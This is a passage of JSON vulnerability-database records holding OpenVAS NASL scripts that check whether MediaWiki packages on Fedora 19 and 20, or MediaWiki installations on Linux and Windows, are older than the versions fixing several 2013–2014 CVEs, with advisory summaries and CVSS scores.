\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12262\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12262\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140819.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:12", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-30T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17264", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868638", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17264\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:56:21 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17264\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17264\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2015-5569", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869260", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2015-5569\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869260\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-19 06:55:37 +0200 (Sun, 19 Apr 2015)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mediawiki FEDORA-2015-5569\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-5569\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154734.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:22", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867678", "href": "http://plugins.openvas.org/nasl.php?oid=867678", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867678);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.8/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4511\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:57", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4478", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867675", "href": "http://plugins.openvas.org/nasl.php?oid=867675", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4478\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867675);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:14:56 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4478\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4478\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131292.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-04T18:50:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867678", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867678\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4511\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-4478", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867675", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867675", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4478\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867675\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:14:56 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4478\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4478\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131292.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:26:48", "description": "This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-11-26T00:00:00", "type": "openvas", "title": "MediaWiki Multiple Vulnerabilities -02 Nov15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310806633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MediaWiki Multiple Vulnerabilities -02 Nov15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mediawiki:mediawiki\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806633\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\");\n script_bugtraq_id(65003);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-26 16:46:38 +0530 (Thu, 26 Nov 2015)\");\n script_name(\"MediaWiki Multiple Vulnerabilities -02 Nov15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error which displays some information about deleted pages in the log\n API, enhanced RecentChanges, and user watchlists.\n\n - An error in CSS whose sanitization did not filter -o-link attributes.\n\n - An error leading SVG sanitization to bypass when the XML was considered\n invalid.\n\n - An error in SVG files upload that could lead to include external stylesheets\n in upload.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct XSS attacks, gain access to sensitive information and\n have other some unspecified impact.\");\n\n script_tag(name:\"affected\", value:\"MediaWiki before 1.19.10, 1.2x before 1.21.4,\n and 1.22.x before 1.22.1 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.19.10 or 1.21.4 or\n 1.22.1 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"os_detection.nasl\", \"secpod_mediawiki_detect.nasl\");\n script_mandatory_keys(\"mediawiki/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!http_ver = get_app_version(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nif(version_is_less(version:http_ver, test_version:\"1.19.10\"))\n{\n fix = \"1.19.10\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:http_ver, test_version:\"1.20\", test_version2:\"1.21.3\"))\n{\n fix = \"1.21.4\";\n VULN = TRUE ;\n}\n\nelse if(version_is_equal(version:http_ver, test_version:\"1.22.0\"))\n{\n fix = \"1.22.1\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + http_ver + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(port:http_port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:27:24", "description": "This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-11-26T00:00:00", "type": "openvas", "title": "MediaWiki Multiple Vulnerabilities -02 Nov15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310806632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806632", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MediaWiki Multiple Vulnerabilities -02 Nov15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 